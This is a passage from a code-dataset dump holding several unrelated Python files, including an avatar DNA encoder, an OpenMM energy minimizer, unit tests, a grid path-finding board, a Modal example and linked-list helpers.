f\"{color_index:0b}\".zfill(self.COLOR_BIT_LEN)\r\n\r\n @staticmethod\r\n def _decode_color(decode_string):\r\n if len(decode_string) == 0:\r\n return None\r\n\r\n decoded_int = int(decode_string, 2)\r\n return COLOR_NAMES[decoded_int]\r\n\r\n def to_bitstring(self):\r\n \"\"\"Encodes the body part to bits\r\n\r\n Returns:\r\n str: a bit string encoding of the body part\r\n \"\"\"\r\n return self._encode_variation() + self._encode_color()\r\n\r\n @classmethod\r\n def from_bitstring(cls, decode_string):\r\n \"\"\"Creates the body part represented by the bitstring\r\n\r\n Args:\r\n decode_string (str): bitstring which matches to the to_bitstring method.\r\n\r\n Returns:\r\n BodyPart: an instance of the class (extends BodyPart) which is encoded in the bitstring.\r\n \"\"\"\r\n assert cls.bit_len() == len(decode_string), \"String decode length mismatch\"\r\n\r\n # if required decode color\r\n if cls.IS_COLORABLE:\r\n color = cls._decode_color(decode_string[-cls.COLOR_BIT_LEN:])\r\n decode_string = decode_string[:-cls.COLOR_BIT_LEN]\r\n else:\r\n color = None\r\n\r\n # decode variation\r\n variation = cls._decode_variation(decode_string)\r\n\r\n return cls(variation, color)\r\n\r\n @classmethod\r\n def randomize(cls):\r\n \"\"\"Randomly generate a body part\r\n\r\n Returns:\r\n BodyPart: A randomized body part of the matching class.\r\n \"\"\"\r\n # if required generate color\r\n if cls.IS_COLORABLE:\r\n color = choice(COLOR_NAMES)\r\n else:\r\n color = None\r\n\r\n # if required generate variation\r\n if cls.VARIATIONS > 1:\r\n variation = randint(0, 
cls.VARIATIONS - 1)\r\n else:\r\n variation = None\r\n\r\n return cls(variation=variation, color=color)\r\n\r\n\r\nclass AvatarBase(ABC):\r\n \"\"\"Base class for user avatars\r\n \r\n This is an abstract class, do not instansiate it.\r\n Do not add several body parts of the same name to the same avatar subclass,\r\n including repeated names up to letter case (for example, 'Face' and 'FACE' are prohibited too).\r\n \r\n Attributes:\r\n body_parts (list of BodyPart): list of the avatar's body parts.\r\n parts should be ordered by the order of the BodyPart initialization\r\n in the avatar class. \r\n \"\"\"\r\n _BODY_PART_TYPES = []\r\n __PART_NAME_TO_INDEX = {}\r\n BITS_IN_NUCLEOTIDE = 2\r\n\r\n def __new__(cls, *args, **kwargs):\r\n \"\"\"\r\n Overriding __new__ to disallow instanciating AvatarBase, \r\n despite not having abstract methods.\r\n \"\"\"\r\n if cls is AvatarBase:\r\n raise TypeError(\"Can't instantiate abstract class Avatar base\")\r\n return super(AvatarBase, cls).__new__(cls)\r\n\r\n def __init__(self, *body_parts):\r\n self.body_parts = []\r\n for part, cls in zip(body_parts, self._BODY_PART_TYPES):\r\n assert isinstance(\r\n part, cls), f\"Given body parts mismatch the required types\"\r\n self.body_parts.append(part)\r\n\r\n @classmethod\r\n def bit_len(cls):\r\n \"\"\"The size of a bit encoding of the avatar\r\n\r\n Returns:\r\n int: the number of bits in a bit representation of an avatar\r\n \"\"\"\r\n return sum([p.bit_len() for p in cls._BODY_PART_TYPES])\r\n\r\n def __getitem__(self, part):\r\n \"\"\"returns an avatar's body part\r\n\r\n Args:\r\n part (str): the name of the body part fetched\r\n\r\n Raises:\r\n KeyError: Bad part name or part name doesn't exist in the avatar.\r\n\r\n Returns:\r\n BodyPart: the avatar's body part with the given body part name\r\n \"\"\"\r\n if not isinstance(part, str):\r\n raise KeyError(\"Get expects a string part name\")\r\n \r\n key = part.lower()\r\n if key not in self.__PART_NAME_TO_INDEX:\r\n raise KeyError(f\"{self.__class__.__qualname__} has not body part {key}\")\r\n \r\n index = self.__PART_NAME_TO_INDEX[key]\r\n if index >= len(self.body_parts):\r\n raise KeyError(f\"Missing body part of type \\'{key}\\'. 
\" +\r\n \"This instance was probably created before the part was registered.\")\r\n \r\n return self.body_parts[index]\r\n\r\n def to_bitstring(self):\r\n \"\"\"Encodes the avatar into a bitstring\r\n\r\n Returns:\r\n str: bitstring which represents the avatar\r\n \"\"\"\r\n return ''.join([part.to_bitstring() for part in self.body_parts])\r\n\r\n @classmethod\r\n def from_bitstring(cls, decode_string):\r\n \"\"\"Creates an avatar from it's describing bitstring\r\n\r\n Args:\r\n decode_string (str): a bitstring which matches the\r\n to_bitstring format of the avatar.\r\n\r\n Returns:\r\n AvatarBase: an instance of this avatar subclass whose features match\r\n the supplied bitstring.\r\n \"\"\"\r\n assert len(decode_string) == cls.bit_len(), \"Bad decode string length\"\r\n\r\n lengths = [p.bit_len() for p in cls._BODY_PART_TYPES]\r\n indices = reduce(lambda lst, length: lst +\r\n [lst[-1] + length], lengths[:-1], [0])\r\n part_strings = [decode_string[i:i + length]\r\n for i, length in zip(indices, lengths)]\r\n parts = [p_type.from_bitstring(s) for s, p_type in zip(\r\n part_strings, cls._BODY_PART_TYPES)]\r\n return cls(*parts)\r\n\r\n def to_dna(self):\r\n \"\"\"Encodes the avatar to a DNA sequence.\r\n \r\n A DNA sequence her means a string whose characters are DNANucleotides.\r\n\r\n Returns:\r\n str: A DNA sequence which represents the bitstring encoding of the avatar\r\n \"\"\"\r\n chunk_size = self.BITS_IN_NUCLEOTIDE\r\n bitstring = self.to_bitstring()\r\n pad = (-len(bitstring) % chunk_size) * '0'\r\n bitstring = pad + bitstring\r\n chunks = [bitstring[i: i + chunk_size] for i in range(0, len(bitstring), chunk_size)]\r\n dna_list = [DNANucleotide(int(chunk, 2)) for chunk in chunks]\r\n return ''.join([nucleotide.name for nucleotide in dna_list])\r\n \r\n @classmethod\r\n def from_dna(cls, dna_string):\r\n \"\"\"Creates an avatar described by the given DNA sequence\r\n \r\n A DNA sequence her means a string whose characters are DNANucleotides.\r\n\r\n Args:\r\n dna_string (str): a DNA sequence which matches the avatar's format.\r\n\r\n Raises:\r\n ValueError: The DNA string given is faulty/doesn't match the format.\r\n\r\n Returns:\r\n AvatarBase: an instance of this avatar subclass whose features match\r\n the supplied DNA.\r\n \"\"\"\r\n chunk_size = cls.BITS_IN_NUCLEOTIDE\r\n\r\n allowed_chars = [e.name for e in DNANucleotide]\r\n\r\n if any([(c not in allowed_chars) for c in dna_string]):\r\n raise ValueError(\"Invalid DNA string.\")\r\n \r\n dna_numbers = [DNANucleotide[ch].value for ch in dna_string]\r\n bitstring = ''.join([f\"{num:0b}\".zfill(chunk_size) for num in dna_numbers])\r\n needed_len = cls.bit_len()\r\n if not (0 <= len(bitstring) - needed_len < chunk_size):\r\n raise ValueError(\"Bad DNA string length\")\r\n pad, bitstring = bitstring[:-needed_len], bitstring[-needed_len:]\r\n if '1' in pad:\r\n raise ValueError(\"Bad DNA string length\")\r\n return cls.from_bitstring(bitstring)\r\n\r\n @classmethod\r\n def randomize(cls):\r\n \"\"\"Randomly generate an avatar\r\n\r\n Returns:\r\n AvatarBase: creates an avatar which has all of it's body parts randomized.\r\n \"\"\"\r\n return cls(*(p.randomize() for p in cls._BODY_PART_TYPES))\r\n \r\n @staticmethod\r\n def _part_to_name(part):\r\n return part.__name__.lower()\r\n \r\n @classmethod\r\n def register_part(cls, part):\r\n \"\"\"Decorator. 
Registers a body part to the avatar class.\r\n\r\n        Registration should occur before any avatar instances are created!\r\n\r\n        Args:\r\n            part (type): the body part class (a BodyPart subclass) to register.\r\n\r\n        Raises:\r\n            TypeError: Attempted to register a part to the AvatarBase\r\n            KeyError: The body part's name is already used by some other part.\r\n        \"\"\"\r\n        if cls is AvatarBase:\r\n            raise TypeError(\"Can't register body parts to AvatarBase\")\r\n\r\n        part_name = cls._part_to_name(part)\r\n        if part_name in cls.__PART_NAME_TO_INDEX:\r\n            raise KeyError(f\"Body part name {part_name} is already taken in {cls.__qualname__}\")\r\n        \r\n        index = len(cls._BODY_PART_TYPES)\r\n        cls._BODY_PART_TYPES.append(part)\r\n        cls.__PART_NAME_TO_INDEX[part_name] = index\r\n\r\n        return part\r\n\r\n","repo_name":"CiniMinis/workshop-project","sub_path":"server/app/modules/avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":12009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20325753864","text":"import pandas as pd\nfrom collections import defaultdict\nfrom sqlalchemy.inspection import inspect\nfrom databaseModel import *\n\n\ndef query_to_dict(rset):\n    result = defaultdict(list)\n    for obj in rset:\n        instance = inspect(obj)\n        for key, x in instance.attrs.items():\n            result[key].append(x.value)\n    return result\n\ndef checkEventType(event1, event2):\n    try:\n        # db.session = db.session(engine)\n        # EventType = Base.classes.event_type\n        temp = pd.DataFrame(query_to_dict(db.session.query(EventType).all()))\n        if not temp.empty:\n            maxId = max(temp['id'])\n        else:\n            maxId = 0\n\n        if maxId:\n            if temp.loc[temp['name'] == event1].empty:\n                db.session.add(EventType(name=event1))\n            if temp.loc[temp['name'] == event2].empty:\n                db.session.add(EventType(name=event2))\n        else:\n            db.session.add(EventType(name=event1))\n            db.session.add(EventType(name=event2))\n        db.session.commit()\n        db.session.close()\n    except:\n        return 'DATABASE ERROR: Something wrong with event_type table!'\n\ndef writeEventLog(gwNumber, eventType):\n    if type(gwNumber) == int:\n        gwNumber = '%014i' %gwNumber\n\n    # Gateway = Base.classes.gateway\n    # EventType = Base.classes.event_type\n    # GatewayLog = Base.classes.gateway_log\n    # db.session = db.session(engine)\n    try:\n        gwId = db.session.query(Device).filter(Device.serial_number == gwNumber).first().id\n    except:\n        db.session.close()\n        return 'DATABASE ERROR: GW number is wrong!'\n\n    try:\n        etId = db.session.query(EventType).filter(EventType.name == eventType).first().id\n    except:\n        db.session.close()\n        return 'DATABASE ERROR: Event type is wrong!'\n    # db.session.add(DeviceLog(event_type_id=etId, gateway_id=gwId))\n    db.session.commit()\n    db.session.close()\n","repo_name":"h4m3d92/AFE_IOT_Server","sub_path":"pgDatabase.py","file_name":"pgDatabase.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6000244881","text":"from scipy import optimize\nfrom openmm.app.pdbfile import PDBFile\nfrom openmm.unit import *\nimport numpy as np\n\nfrom EnergyReporter import EnergyReporter\nfrom molFileReader import molFileReader\n\n# pylint: disable=no-member\nimport openmm\npicoseconds = openmm.unit.picoseconds\npicosecond = picoseconds\nnanometer = openmm.unit.nanometer\nfemtoseconds = openmm.unit.femtoseconds\n# pylint: enable=no-member\n\nconstr_2_idx = {\n    'X': [0], 'Y': [1], 'Z': [2],\n    'XY': [0, 1], 'XZ': [0, 2], 'YZ': [1,2],\n    'YX': [0, 1], 'ZX': [0, 2], 'ZY': [1,2],\n    'XYZ': [0, 1, 
2]\n}\n\n\n\nclass BFGS(object):\n    def __init__(self, context, constraints=None, out_pdb=None, topology=None):\n        self._out_file = None\n        self._topology = topology\n        self._step_num = 0\n        self._constraints = constraints\n        self._context = context\n        if out_pdb is not None and topology is not None:\n            self._out_file = open(out_pdb, 'w')\n\n\n    def _callback(self, pos):\n        if self._out_file is not None:\n            PDBFile.writeModel(self._topology, pos.reshape(-1,3)*nanometer, file=self._out_file, modelIndex=self._step_num)\n        self._step_num += 1\n\n\n    def minimize(self):\n        #constraints = dict(zip(np.arange(64), ['Z']*64))\n\n        init_state = self._context.getState(getForces=True, getEnergy=True, getPositions=True)\n        init_pos = init_state.getPositions(True).value_in_unit(nanometer)\n        init_energy, init_forces = self._target_func(init_pos, self._context, self._constraints)\n        force_norms = [np.linalg.norm(f) for f in init_forces]\n        print(\" Initial max. force: {:15.3f} kJ/mol/nm\".format(np.max(force_norms)))\n        print(\" Initial energy:     {:15.3f} kJ/mol\".format(init_energy))\n\n\n        self._step_num = 0\n        args = (self._context, self._constraints)\n        self._callback(init_pos)\n        res = optimize.minimize(self._target_func, init_pos, args=args, method='L-BFGS-B', jac=True, callback=self._callback,\n            options=dict(maxiter=500, disp=False, gtol=5))\n        final_pos = res.x.reshape(-1,3)\n\n        final_energy, final_forces = self._target_func(final_pos, self._context, self._constraints)\n        force_norms = [np.linalg.norm(f) for f in final_forces]\n        print(\" Final max. force: {:15.3f} kJ/mol/nm\".format(np.max(force_norms)))\n        print(\" Final energy:     {:15.3f} kJ/mol\".format(final_energy))\n\n\n    def _target_func(self, pos, context, constraints=None):\n        context.setPositions(pos.reshape(-1,3))\n        state = context.getState(getEnergy=True, getForces=True)\n        forces = state.getForces(asNumpy=True)\n        energy = state.getPotentialEnergy().value_in_unit(kilojoule_per_mole)\n        forces = forces.value_in_unit(kilojoule_per_mole/nanometer)\n\n        if constraints is not None:\n            for n, constr in constraints.items():\n                for idx in constr_2_idx[constr.upper()]:\n                    forces[n][idx] *= 0\n\n        return energy, -forces.flatten()\n\n","repo_name":"ChristopherAMyers/OpenMMEnergies","sub_path":"minimize.py","file_name":"minimize.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"11113413023","text":"import unittest\nimport os\n\nfrom sgeproxy.publisher import RecordsByName, StreamsFiles\nfrom quoalise.data import Data, Metadata\nfrom slixmpp.xmlstream import ET\n\nTEST_DATA_DIR = os.path.join(os.path.dirname(__file__), \"test_data\", \"streams\")\n\n\nclass Args:\n    aes_iv = None\n    aes_key = None\n\n\ndef day_records():\n    streams_files = StreamsFiles(\n        inbox_dir=None,\n        archive_dir=os.path.join(TEST_DATA_DIR, \"archive\", \"2023-01-15\"),\n        errors_dir=None,\n        aes_iv=Args.aes_iv,\n        aes_key=Args.aes_key,\n        publish_archives=True,\n    )\n    records_by_name = RecordsByName()\n    for f in streams_files.glob():\n        for metadata, record in streams_files.file_records(f):\n            records_by_name.add(metadata, record)\n    return records_by_name\n\n\nclass TestStreams(unittest.TestCase):\n    def test_day_all(self):\n\n        records_by_name = day_records()\n        for metadata, records in records_by_name.get():\n            print(metadata.to_dict())\n            for record in records:\n                self.assertEqual(record.unit, metadata.measurement.unit.value)\n                self.assertTrue(\n                    record.name.startswith(\n                        
f\"urn:dev:prm:{metadata.device.identifier.value}\"\n )\n )\n\n def test_day_prefix(self):\n\n NAME = \"urn:dev:prm:30001444954220_consumption/power/inductive/raw\"\n\n records_by_name = day_records()\n\n for _, records in records_by_name.get(NAME):\n for record in records:\n self.assertEqual(NAME, record.name)\n\n def test_day_chunk(self):\n\n NAME = \"urn:dev:prm:30001444954220_consumption/power/inductive/raw\"\n CHUNK_SIZE = 10\n\n all_records_chunks = []\n\n records_by_name = day_records()\n\n for metadata, records in records_by_name.get(NAME):\n all_records = records\n all_records_meta = metadata\n\n for metadata, records in records_by_name.get(NAME, chunk_size=CHUNK_SIZE):\n self.assertEqual(metadata, all_records_meta)\n self.assertTrue(len(records) <= CHUNK_SIZE)\n all_records_chunks.extend(records)\n\n self.assertEqual(all_records, all_records_chunks)\n\n def test_day_to_xml(self):\n\n records_by_name = day_records()\n for metadata, records in records_by_name.get():\n data = Data(metadata=Metadata(metadata.to_dict()), records=records)\n as_xml = data.to_xml()\n as_xml = ET.tostring(as_xml, encoding=\"utf8\", method=\"xml\")\n print(as_xml.decode(\"utf-8\"))\n\n def test_get_records_grouped_by_metadata(self):\n\n NAME = \"urn:dev:prm:30001444954220_consumption/energy/active/index\"\n # This series name will match with records named\n #\n # …_consumption/energy/active/index\n # …_consumption/energy/active/index/distributor/hph\n # …_consumption/energy/active/index/distributor/hch\n # …\n #\n # We them all at once, as they share the same metadata\n\n records_by_name = day_records()\n records_by_meta = list(records_by_name.get(NAME))\n self.assertTrue(len(records_by_meta) == 1)\n self.assertTrue(len(records_by_meta[0][1]) > 0)\n\n\nif __name__ == \"__main__\":\n\n import sys\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"aes_iv\",\n help=\"iv used to decrypt stream files\",\n )\n parser.add_argument(\n \"aes_key\",\n help=\"key used to decrypt stream files\",\n )\n args, unittest_args = parser.parse_known_args()\n\n Args.aes_iv = args.aes_iv\n Args.aes_key = args.aes_key\n\n unittest.main(argv=[sys.argv[0]] + unittest_args)\n","repo_name":"consometers/sge-tiers-proxy","sub_path":"sgeproxy/test_streams.py","file_name":"test_streams.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"7769810331","text":"#!/usr/bin/env python\n\nimport re\nfrom pathlib import Path\n\ncog_onto = \"cog-20.def.tab\"\nfun_lookup = \"fun-20.tab\"\ncog_out = \"COG-onto_rel1.tsv\"\n\n#COG0001\tH\tGlutamate-1-semialdehyde aminotransferase\tHemL\tHeme biosynthesis\t\t2CFB\n#1. COG ID\n#2. COG functional category (could include multiple letters in the order of importance)\n#3. COG name\n#4. Gene associated with the COG (optional)\n#5. Functional pathway associated with the COG (optional)\n#6. PubMed ID, associated with the COG (multiple entries are semicolon-separated; optional)\n#7. PDB ID of the structure associated with the COG (multiple entries are semicolon-separated; optional)\n\n#H\tDCDCFC\tCoenzyme transport and metabolism\n#1. Functional category ID (one letter)\n#2. Hexadecimal RGB color associated with the functional category\n#3. 
Functional category description\n\n#L1\tL2\tL3\tID\tFunction\tEC\n#Metabolism\tCarbohydrate metabolism\tGlycolysis / Gluconeogenesis [PATH:ko00010]\tK00844\tHK; hexokinase\t2.7.1.1\n\n\nfun = Path(fun_lookup).read_text()\nwith open(cog_onto) as cog, open(cog_out, 'w') as writer:\n    print('L1', 'L2', 'ID', 'Function', 'EC', sep='\\t', file=writer)\n    for line in cog:\n        COG_ID, FUN_CAT, NAME, GENE, PATHWAY, PUBMED, PDB_ID = line.strip('\\n').split('\\t')\n        for c in FUN_CAT:\n            COLOR,CAT = re.search(rf'{c}\\t(.*)\\t(.*)', fun).groups()\n            print(CAT, NAME, COG_ID, f\"{GENE}; {PATHWAY}\", '', sep='\\t', file=writer)\n","repo_name":"raw-lab/MetaCerberus","sub_path":"src/COG/cog.py","file_name":"cog.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"722846859","text":"import torchnet.transform as transform\nimport unittest\nimport torch\n\n\nclass TestTransforms(unittest.TestCase):\n    def testCompose(self):\n        self.assertEqual(transform.compose([lambda x: x + 1, lambda x: x + 2, lambda x: x / 2])(1), 2)\n\n    def testTableMergeKeys(self):\n        x = {\n            'sample1': {'input': 1, 'target': \"a\"},\n            'sample2': {'input': 2, 'target': \"b\", 'flag': \"hard\"}\n        }\n\n        y = transform.tablemergekeys()(x)\n\n        self.assertEqual(y['input'], {'sample1': 1, 'sample2': 2})\n        self.assertEqual(y['target'], {'sample1': \"a\", 'sample2': \"b\"})\n        self.assertEqual(y['flag'], {'sample2': \"hard\"})\n\n    def testTableApply(self):\n        x = {1: 1, 2: 2}\n        y = transform.tableapply(lambda x: x + 1)(x)\n        self.assertEqual(y, {1: 2, 2: 3})\n\n    def testMakeBatch(self):\n        x = [\n            {'input': torch.randn(4), 'target': \"a\"},\n            {'input': torch.randn(4), 'target': \"b\"},\n        ]\n        y = transform.makebatch()(x)\n        self.assertEqual(y['input'].size(), torch.Size([2, 4]))\n        self.assertEqual(y['target'], [\"a\", \"b\"])\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"alexsax/midlevel-reps","sub_path":"tnt/test/test_transforms.py","file_name":"test_transforms.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"37"} +{"seq_id":"33292611036","text":"import math\n\nclass Cell(object):\n    def __init__(self, x, y, blocked=False):\n        self.x = x\n        self.y = y\n        self.blocked = blocked\n\n    def distance(self, other_cell):\n        if (self.x == other_cell.x and self.y == other_cell.y):\n            return 0\n        if (self.x == other_cell.x):\n            return 5 * abs(other_cell.y - self.y)\n        if (self.y == other_cell.y):\n            return 5 * abs(other_cell.x - self.x)\n        return 5 * math.sqrt((other_cell.x - self.x)**2 + (other_cell.y - self.y)**2)\n\n    def __str__(self):\n        return f'({self.x}.{self.y})'\n\n    def __repr__(self):\n        return str(self)\n\nclass Wall(object):\n    def __init__(self, x, y, horizontal):\n        self.x = x\n        self.y = y\n        self.horizontal = horizontal\n\n    def __str__(self):\n        output = f'({self.x}.{self.y}.'\n        if (self.horizontal):\n            output += \"H)\"\n        else:\n            output += \"V)\"\n        return output\n\n    def __repr__(self):\n        return str(self)\n\nclass CellList(object):\n    def __init__(self, cl):\n        self.cells = cl\n\n    def __str__(self):\n        output = \"\"\n        first_cell = True\n        for cell in self.cells:\n            if (first_cell):\n                output += str(cell)\n                first_cell = False\n            else:\n                output += \", \" + str(cell)\n        return output\n\n    def __repr__(self):\n        return str(self)\n\n\nclass Node(object):\n    def __init__(self, cell, distance, cell_path):\n        self.cell = cell\n        self.distance = distance\n        self.cell_path = 
cell_path\n self.processed = False\n\nclass Board(object):\n HORIZONTAL = True\n VERTICAL = False\n\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self.cells = list()\n self.walls = list()\n for x in range(width):\n row = list()\n for y in range(height):\n row.append(Cell(x, y))\n self.cells.append(row)\n\n def get_cells_in_range(self, cell, range):\n cells_in_range = list()\n for row in self.cells:\n for c in row:\n if (c.distance(cell) <= range):\n cells_in_range.append(c)\n return CellList(cells_in_range)\n\n def add_wall(self, start_x, start_y, horizontal, length):\n for i in range(length):\n if (horizontal):\n self.walls.append(Wall(start_x + i, start_y, self.HORIZONTAL))\n else:\n self.walls.append(Wall(start_x, start_y + i, self.VERTICAL))\n\n def check_wall(self, another_wall):\n for wall in self.walls:\n if (wall.x == another_wall.x and wall.y == another_wall.y and wall.horizontal == another_wall.horizontal):\n return True\n return False\n\n def get_cells_reachable(self, cell, range, dist_acum, nodes, cell_path):\n if (dist_acum > range):\n #print(f\"get_cells_reachable: For cell {cell} dist_acum({dist_acum}) > range({range}) - return\")\n return\n\n if (str(cell) in nodes):\n #print(f'get_cells_reachable: Cell {str(cell)} already in nodes')\n node = nodes[str(cell)]\n if (node.distance > dist_acum):\n #print(f'get_cells_reachable: Better path for cell {str(cell)}')\n node.distance = dist_acum\n node.cell_path = cell_path\n node.processed = False\n else:\n node = Node(cell, dist_acum, cell_path)\n nodes[str(cell)] = node\n #print(f'get_cells_reachable: Cell {str(cell)} not in nodes. Adding it.')\n\n if (not node.processed):\n #print(f'get_cells_reachable: Prospecting cells adjacent to cell {cell}')\n interval = [-1, 0, 1]\n for dx in interval:\n for dy in interval:\n x = cell.x + dx\n y = cell.y + dy\n if (x >= 0 and y >= 0 and x < len(self.cells) and y < len(self.cells[0])):\n if (dx == 0):\n if (dy == -1):\n if (self.check_wall(Wall(cell.x, cell.y, self.HORIZONTAL))):\n continue\n elif (dy == 1):\n if (self.check_wall(Wall(cell.x, cell.y+dy, self.HORIZONTAL))):\n continue\n elif (dy == 0):\n if (dx == -1):\n if (self.check_wall(Wall(cell.x, cell.y, self.VERTICAL))):\n continue\n elif (dx == 1):\n if (self.check_wall(Wall(cell.x+dx, cell.y, self.VERTICAL))):\n continue\n else:\n if (dx == -1):\n if (dy == -1):\n if (self.check_wall(Wall(cell.x, cell.y, self.VERTICAL)) or self.check_wall(Wall(cell.x, cell.y, self.HORIZONTAL))):\n continue\n if (self.check_wall(Wall(cell.x, cell.y+dy, self.VERTICAL)) or self.check_wall(Wall(cell.x+dx, cell.y, self.HORIZONTAL))):\n continue\n if (dy == 1):\n if (self.check_wall(Wall(cell.x, cell.y, self.VERTICAL)) or self.check_wall(Wall(cell.x, cell.y+dy, self.HORIZONTAL))):\n continue\n if (self.check_wall(Wall(cell.x+dx, cell.y+dy, self.HORIZONTAL)) or self.check_wall(Wall(cell.x, cell.y+dy, self.VERTICAL))):\n continue\n if (dx == 1):\n if (dy == -1):\n if (self.check_wall(Wall(cell.x, cell.y, self.HORIZONTAL)) or self.check_wall(Wall(cell.x+dx, cell.y, self.VERTICAL))):\n continue\n if (self.check_wall(Wall(cell.x+dx, cell.y+dy, self.VERTICAL)) or self.check_wall(Wall(cell.x+dx, cell.y, self.HORIZONTAL))):\n continue\n if (dy == 1):\n if (self.check_wall(Wall(cell.x+dx, cell.y+dy, self.VERTICAL)) or self.check_wall(Wall(cell.x+dx, cell.y+dy, self.HORIZONTAL))):\n continue\n if (self.check_wall(Wall(cell.x, cell.y+dy, self.HORIZONTAL)) or self.check_wall(Wall(cell.x+dx, cell.y, self.VERTICAL))):\n continue\n\n 
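                        # The checks above encode the wall-blocking rules: a straight step (dx == 0 or dy == 0) is blocked by the single wall lying on the shared edge, while a diagonal step is blocked whenever either pair of perpendicular walls closes off the corner the path would cut across. Reaching this point means no wall combination blocks the step into cell (x, y).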
c = self.cells[x][y]\n if (not c in cell_path and not c.blocked):\n dist = cell.distance(c)\n if (dist > 0):\n cp = cell_path + [c]\n #print(f'Prospecting cell {c}')\n self.get_cells_reachable(c, range, dist_acum + dist, nodes, cp)\n node.processed = True\n\n\nb = Board(10, 10)\nb.cells[6][2].blocked = True\nb.cells[7][2].blocked = True\nb.add_wall(2, 2, b.HORIZONTAL, 4)\nb.add_wall(2, 2, b.VERTICAL, 4)\nb.add_wall(6, 2, b.VERTICAL, 2)\nb.add_wall(2, 6, b.HORIZONTAL, 4)\nb.add_wall(6, 5, b.VERTICAL, 1)\nb.add_wall(8, 0, b.VERTICAL, 8)\nb.add_wall(0, 8, b.HORIZONTAL, 8)\n\nfor w in b.walls:\n print(w)\n\ncell = b.cells[2][2]\nrange = 400\ndist_acum = 0\nnodes = {}\ncell_path = [cell]\nb.get_cells_reachable(cell, range, dist_acum, nodes, cell_path)\n\nprint(f\"cells in range {range} from cell {str(cell)}:\")\nfor key, n in nodes.items():\n cp = \"\"\n for c in n.cell_path:\n cp += f'{str(c)} '\n print(f' Cell:{str(n.cell)} Dist:{n.distance:.2f} Path:{cp}')\n","repo_name":"AlexGP80/RPG","sub_path":"utils/euclidean2.py","file_name":"euclidean2.py","file_ext":"py","file_size_in_byte":7957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33819530854","text":"import os, sys\nfrom copy import copy\nfrom utils import Container, nl\n\n\nsizes = [\n (1, \"ant\", 0.01),\n (2, \"doorway\", 1),\n (3, \"baseball bat\", 1),\n (5, \"whale\", 10),\n (6, \"city block\", 100),\n (7, \"Eiffel tower\", 300),\n (8, \"English channel (narrowest)\", 35000),\n (9, \"AU (Earth to Sun)\", 1.5e11),\n (10, \"Light Year\", 9.5e15),\n\n (21, \"thickness of sunglasses\", 0.001),\n (22, \"Staphilococcus bacterium\", 1e-6),\n (23, \"Poliovirus\", 3e-8),\n (24, \"Hydrogen atom diameter\", 1e-10),\n (25, \"Hydrogen nucleus\", 2.4e-15),\n ]\n\nsizes = {s[0]: Container(name=s[1], size=s[2]) for s in sizes}\n\n\nclass Rescaler(object):\n tpl = \"%-28s %s\"\n msg = \"If %s was the size of %s\" + nl*2\n\n def rescale(self, i1, i2):\n i1, i2 = sizes[i1], sizes[i2]\n scaled = copy(sizes)\n ratio = i1.size / i2.size\n print(self.msg % (i1.name, i2.name))\n\n for item in scaled.values():\n item.size /= ratio\n print(self.tpl % (item.name, self.format(item.size)))\n\n def format(self, val):\n def fmt(val):\n plural = '' if val==1 else 's'\n return (\"%.2f\" % val).rstrip('0').rstrip('.'), plural\n\n if val < 1e-9:\n return \"less than a nanometer\"\n elif 1e-9 <= val < 1e-6:\n return \"%s nanometer%s\" % fmt(val * 1e9)\n elif 1e-6 <= val < .001:\n return \"%s micrometer%s\" % fmt(val * 1e6)\n elif .001 <= val < .01:\n return \"%s millimeter%s\" % fmt(val * 1000)\n elif .01 <= val < 1:\n return \"%s centimeter%s\" % fmt(val * 100)\n elif 1 <= val < 1000:\n return \"%s meter%s\" % fmt(val)\n elif val >= 1000:\n return \"%s kilometer%s\" % fmt(val / 1000)\n\n\n\nif __name__ == \"__main__\":\n try : Rescaler().rescale(5, 1)\n except KeyboardInterrupt : pass\n","repo_name":"pythonbyexample/PBE","sub_path":"chapter01/rescaler.py","file_name":"rescaler.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"11574610827","text":"import subprocess\n\nimport modal\n\nstub = modal.Stub(\"modal-arbitrary-code-example\")\n\n\n@stub.function(\n mounts=[\n modal.Mount.from_local_dir(\n local_path=\"./rust\",\n remote_path=\"/root/rust\",\n )\n ],\n)\ndef run_rs() -> None:\n subprocess.run([\"chmod\", \"+x\", \"/root/rust/bin/x86/app\"])\n 
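    # chmod first: files mounted into the image may not keep the execute bit, so the binary is marked executable before it is invoked (run_rb below uses the same chmod-then-run pattern).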
subprocess.run([\"/root/rust/bin/x86/app\"])\n\n\n@stub.function(\n image=modal.Image.debian_slim().apt_install(\"ruby-full\"),\n mounts=[\n modal.Mount.from_local_dir(\n local_path=\"./ruby\",\n remote_path=\"/root/ruby\",\n )\n ],\n)\ndef run_rb() -> None:\n subprocess.run([\"chmod\", \"+x\", \"/root/ruby/app.rb\"])\n subprocess.run([\"ruby\", \"/root/ruby/app.rb\"])\n\n\n@stub.local_entrypoint\ndef main() -> None:\n \"\"\"Main entrypoint.\"\"\"\n run_rs.call()\n run_rb.call()\n","repo_name":"anthonycorletti/modal-arbitrary-code-example","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71737336748","text":"def head(L):\n return L[0]\n \ndef tail(L):\n return L[1]\n\ndef py2ll(L):\n if not L:\n return None\n else:\n return (L[0], py2ll(L[1:]))\n\ndef ll2py(L):\n if not L:\n return []\n else:\n H = head(L)\n T = tail(L)\n return [H] + ll2py(T)\n\ndef size(L):\n if not (L):\n return 0\n else:\n return 